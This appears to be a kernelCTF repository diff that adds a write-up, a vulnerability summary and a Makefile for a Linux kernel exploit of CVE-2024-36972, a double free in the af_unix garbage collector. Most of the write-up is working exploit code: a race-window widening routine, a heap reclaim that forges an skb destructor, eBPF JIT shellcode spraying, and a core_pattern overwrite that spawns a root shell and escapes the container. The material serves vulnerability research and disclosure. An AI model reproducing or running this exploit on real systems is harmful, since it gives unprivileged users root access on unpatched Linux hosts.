google
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/exploit.md
+270 b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/exploit.md
+270
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/vulnerability.md
+15 b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/vulnerability.md
+15
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/Makefile
+11 b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/Makefile
+11
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/exploit
935 KB b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/exploit
935 KB
@@ -0,0 +1,270 @@
+# Vulnerability
+unix_gc() tries to garbage-collect inflight sockets, and then if the socket has MSG_OOB in unix_sk(sk)->oob_skb, GC will drop the reference locklessly.  
+It will cause race condition in unix_gc[1] while peer unix socket call queue_oob[2].
+
+* unix_gc
+```c
+	skb_queue_head_init(&hitlist);
+	list_for_each_entry(u, &gc_candidates, link) {
+		scan_children(&u->sk, inc_inflight, &hitlist);
+
+#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+		if (u->oob_skb) {
+			kfree_skb(u->oob_skb); //[1]
+			u->oob_skb = NULL;
+		}
+#endif
+	}
+
+```
+
+* queue_oob
+```c
+	if (ousk->oob_skb)
+		consume_skb(ousk->oob_skb); //[2]
+
+	WRITE_ONCE(ousk->oob_skb, skb);
+```
+
+
+
+# Exploit Tech Detail
+The exploit is consist in the following steps
+* Prepare timerfd to extend race window
+* Prepare refcount circle to make unix_gc free victim unix_socket
+* Race between unix_gc with queue_oob
+* Reclaim SKB with msg_msg to control destructor
+* Call kfree_skb to RIP Control
+* Achieve container escape.
+
+## Prepare timerfd to extend race window
+We adopt the exploit tech from `Jann's blog Racing against the clock -- hitting a tiny kernel race window` to extend the race windows
+To make race windows larger on kernels without CONFIG_PREEMPT.
+* make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
+* make sure that the wakeup triggered by the timerfd has to churn through many waitqueue items created by epoll
+
+So function `do_epoll_enqueue` in our exploit code is to do such thing
+```C
+void do_epoll_enqueue(int fd)
+{
+	int cfd[2];
+	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
+	for (int k = 0; k < 0x4; k++)
+	{
+		if (fork() == 0)
+		{
+			for (int i = 0; i < 0x100; i++)
+			{
+				timefds[i] = SYSCHK(dup(fd));
+			}
+			for (int i = 0; i < 0xc0; i++)
+			{
+				epfds[i] = SYSCHK(epoll_create(0x1));
+			}
+			for (int i = 0; i < 0xc0; i++)
+			{
+				for (int j = 0; j < 0x100; j++)
+				{
+					// queue as many as possible async waiters at timerfd waitqueue
+					epoll_ctl_add(epfds[i], timefds[j], 0);
+				}
+			}
+			write(cfd[1], buf, 1);
+			raise(SIGSTOP); // stop here for nothing and just keep epoll alive
+		}
+		// sync to make sure it has queue what we need
+		read(cfd[0], buf, 1);
+	}
+	close(cfd[0]);
+	close(cfd[1]);
+}
+```
+
+## Race between unix_gc with queue_oob
+
+sk_buff's refcount is named as users. When sk_buff will be freed if users==1 while calling kfree_skb.  
+Unix socket oob_skb's users has two. One is for stored in unix_sock->oob_skb and another is for sock->sk_receive_queue.
+We use two threads to cause race between unix_gc and queue_oob in the following condition.
+
+Thread A                 		      | Thread B
+----------------------------|------------------------------
+queue_oob() // users == 2 <br> consume_skb() // users == 2 -> 1 | unix_gc()
+<br> | if (u->oob_skb)  // users == 1 <br> kfree_skb(u->oob_skb) // free skb
+WRITE_ONCE(ousk->oob_skb, skb) | 
+<br> | unix_release_sock() <br> skb = skb_dequeue(&sk->sk_receive_queue) <br> kfree_skb(skb); // skb UAF
+
+## Reclaim SKB with msg_msg to control destructor
+
+sk_buff is under `skbuff_head_cache` with size `0xe0`
+```
+gef➤  p sizeof(struct sk_buff)
+$1 = 0xe0
+```
+With cross-cache tech, we can reclaim victim skb as msg_msg which is under `kmalloc-cg-256` cache like following example code.
+
+* Allocate a lot skbs between victim
+```c
+		// Allocate some sk_buff before oob_skb
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(send(datafd[1], buf, 1, 0));
+
+		SYSCHK(send(victim_fd[1], buf, 1, MSG_OOB));
+
+		// Allocate some sk_buff after oob_skb
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(send(datafd[0], buf, 1, 0));
+
+```
+
+* Free them all and reclaim as msg_msg
+```c
+		// free all skbs
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(recv(datafd[0], buf, 1, 0));
+
+		// free all skbs
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(recv(datafd[1], buf, 1, 0));
+
+		// cross-cache to reclaim oob_skb as msg_msg
+		for (int i = 0; i < 0x1000; i++)
+			SYSCHK(msgsnd(msqid[i], &msg, 0x100 - 0x30, 0));
+```
+
+* Forge skb to make users equal to one and destructor as the address we want to jump to
+
+```c
+	char *skb = (void *)&msg.mtext[-0x30];
+
+	// struct sk_buff {
+	//     void       (*destructor)(struct sk_buff *); /*    96     8 */
+	//     refcount_t                 users;                /*   220     4 */
+#define OFFSET_SKB_DESTRUCTOR 96
+#define OFFSET_SKB_USERS 220
+	*(size_t *)(skb + OFFSET_SKB_DESTRUCTOR) = 0xffffffffcc000000 - 0x800;
+	*(unsigned *)(skb + OFFSET_SKB_USERS) = 1;
+```
+
+## RIP Control
+We set `skb->destructor` to guessed ebpf JIT address.
+
+```c
+void skb_release_head_state(struct sk_buff *skb)
+{
+	skb_dst_drop(skb);
+	if (skb->destructor) {
+		DEBUG_NET_WARN_ON_ONCE(in_hardirq());
+		skb->destructor(skb);
+	}
+```
+
+
+## Achieve container escape
+### Spray eBPF programs
+Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode.
+
+Linux kernel provide a socket option `SO_ATTACH_FILTER` and let user to attach a classic BPF program to the socket for use as a filter of incoming packets.
+
+By creating lots of sockets and attach to classic BPF program, we can spray a lot of eBPF programs in kernel.
+```cpp
+    struct sock_fprog prog = {
+        .len =  TSIZE,
+        .filter = filter,
+    };
+    for(int i=0;i<NUM;i++){
+        int fd[2];
+        SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd));
+        SYSCHK(setsockopt(fd[0],SOL_SOCKET,26,&prog,sizeof(prog)));
+    }
+```
+
+As for the shellcode in our eBPF program, our goal is to overwrite  `/proc/sys/kernel/core_pattern` so later we can execute command as root by triggering crash. Here's what our shellcode did to achieve our goal:
+* Use the `rdmsr` instruction to obtain the kernel text address. With RCX being set to MSR_LSTAR ( `0xc0000082` ), we'll be able to obtain the address of `entry_SYSCALL_64`.
+* Calculate the address of `core_pattern` and `_copy_from_user`.
+* Call `_copy_from_user(core_pattern, user_buf, 0x30);`, where `user_buf` is a buffer in user space that stores the content we want to overwrite in `core_pattern`. 
+
+We construct our eBPF program with the following form:
+
+```cpp
+struct sock_filter table[] = {
+        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
+        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
+        .....................
+};
+```
+
+The above example will be compiled into the following instructions after JIT:
+
+```
+b8 90 90 90 b3    mov eax, 0xb3909090
+b8 90 90 90 b3    mov eax, 0xb3909090
+```
+
+If we can control kernel RIP to jump into the NOP instruction ( 0x90 ), the code will become:
+
+```
+90       nop 
+b3 b8    mov    bl, 0xb8
+90       nop
+90       nop
+90       nop
+b3 b8    mov    bl, 0xb8
+....
+```
+
+We can see that by using an extra byte `0xb3`, we can skip the useless byte `0xb8` and execute our own shellcode. Notice that due to the "skipping part", we only have 3 bytes of space in each instruction, so we'll have to take care of that as well during our shellcode construction.
+
+### Post RIP
+
+Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted will cause core_pattern being overwritten to `|/proc/%P/fd/666 %P`:
+
+We then use memfd and write an executable file payload in fd 666.
+```C
+int check_core()
+{
+	// Check if /proc/sys/kernel/core_pattern has been overwritten
+	char buf[0x100] = {};
+	int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+	read(core, buf, sizeof(buf));
+	close(core);
+	return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+void crash(char *cmd)
+{
+	int memfd = memfd_create("", 0);
+	SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+	dup2(memfd, 666);
+	close(memfd);
+	while (check_core() == 0)
+		sleep(1);
+	puts("Root shell !!");
+	/* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */
+	*(size_t *)0 = 0;
+}
+```
+
+Later when coredump happened, it will execute our executable file as root in root namespace:
+```C
+*(size_t*)0=0; //trigger coredump
+```
+
+Spawn shell when coredump happened. This is the code looks like:
+```c++
+int main(int argc, char **argv)
+{
+        if (argc > 1)
+        {
+			// #define SYS_pidfd_getfd 438
+			int pid = strtoull(argv[1], 0, 10);
+			int pfd = syscall(SYS_pidfd_open, pid, 0);
+			int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+			int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+			int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+			dup2(stdinfd, 0);
+			dup2(stdoutfd, 1);
+			dup2(stderrfd, 2);
+			/* Get flag and poweroff immediately to boost next round try in PR verification workflow*/
+			system("cat /flag;echo o>/proc/sysrq-trigger");
+			execlp("bash", "bash", NULL);
+		}
+```
@@ -0,0 +1,15 @@
+- Requirements:
+    - Capabilites: None
+    - Kernel configuration: CONFIG_AF_UNIX_OOB
+    - User namespaces required: No
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1279f9d9dec2d7462823a18c29ad61359e0a007d
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9841991a446c87f90f66f4b9fee6fe934c1336a2
+- Affected kernel versions: v6.8 - v6.9, v5.15.147, v6.1.78, v6.6.17
+- Affected component: af_unix
+- Syscall to disable: socket
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-36972
+- Cause: Double Free
+- Description: A double free vulnerability in the Linux kernel's af_unix. __unix_gc() tries to garbage-collect close()d inflight sockets,
+and then if the socket has MSG_OOB in unix_sk(sk)->oob_skb, GC will drop the reference and set NULL to it locklessly.
+However, the peer socket still can send MSG_OOB messages and queue_oob() can update unix_sk(sk)->oob_skb concurrently, leading double free.
+We recommend upgrading past commit 9841991a446c87f90f66f4b9fee6fe934c1336a2
@@ -0,0 +1,11 @@
+all: exploit
+
+exploit: poc.c sc.h
+	gcc poc.c -o exploit -static -pthread
+
+install: poc
+	scp poc vm:
+	ssh vm ./poc
+clean:
+	rm poc sc.h
+